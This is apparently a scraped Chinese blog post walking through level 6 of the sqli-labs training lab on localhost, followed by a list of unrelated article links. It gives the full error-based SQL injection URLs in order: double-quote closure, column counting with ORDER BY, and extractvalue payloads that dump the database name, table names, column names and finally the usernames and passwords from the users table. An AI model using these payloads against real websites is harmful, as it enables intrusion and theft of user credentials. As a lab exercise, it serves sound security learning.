当前位置: 首页 > news >正文

SQL注入第6关

news 2025/8/26 16:19:41

存在SQL注入,且闭合为双引号

查询数据库列数:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 3--+

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 4--+

查询可知列数为3

查询数据库库名:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ 

查询数据库中的表名:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+ 

查询users表中的字段:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'  and table_schema='security'),0x7e))--+ 

查询表内容:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password)) from security.users),0x7e))--+

http://www.dtcms.com/a/76588.html

相关文章:

  • 如何用日事清做研发目标、需求、规划、迭代、Bug、效能、复盘、绩效一站式管理
  • 3月18号
  • 7种数据结构
  • ubuntu安装NVIDIA显卡驱动及CUDA环境
  • 【MySQL】关闭外键约束检查
  • python-leetcode 47.组合总和
  • Redis 面试思路
  • 深度学习-148-langchain之如何使用with_structured_output()从模型中返回结构化数据
  • 机试准备第19天
  • 4.angular 服务
  • 5.3《凸透镜成像的规律》——先于5.2《生活中的透镜》讲
  • Windows 部署 RuoYi 前后端分离项目
  • Mac下Ollama安装全攻略:开启本地大模型之旅
  • Qt Creator入门
  • 蓝桥杯[每日一题] 模拟题:蚂蚁感冒(java版)
  • Java面试黄金宝典1
  • 笔记本运行边缘计算
  • 使用React和google gemini api 打造一个google gemini应用
  • 【数据挖掘】Python基础环境安装配置
  • 卸载conda,poetry常用命令,vscode使用poetry虚拟环境
  • 【万字总结】前端全方位性能优化指南(三)——GPU渲染加速、WebGPU、OffscreenCanvas多线程渲染
  • 电商项目Ts版本
  • 【HarmonyOS Next】鸿蒙中自定义弹框OpenCustomDialog、CustomDialog与DialogHub的区别详解
  • 标准卡尔曼滤波
  • 采购供应链管理培训及供应链网络优化案例P109(109页PPT)(文末有下载方式)
  • python爬虫笔记(一)
  • Vue响应式数据丢失的可能原因
  • C语言:能够规定次数,处理非法字符的猜数游戏(三重循环)
  • 【一起来学kubernetes】17、Configmap使用详解
  • mysql-隐藏字段_rowid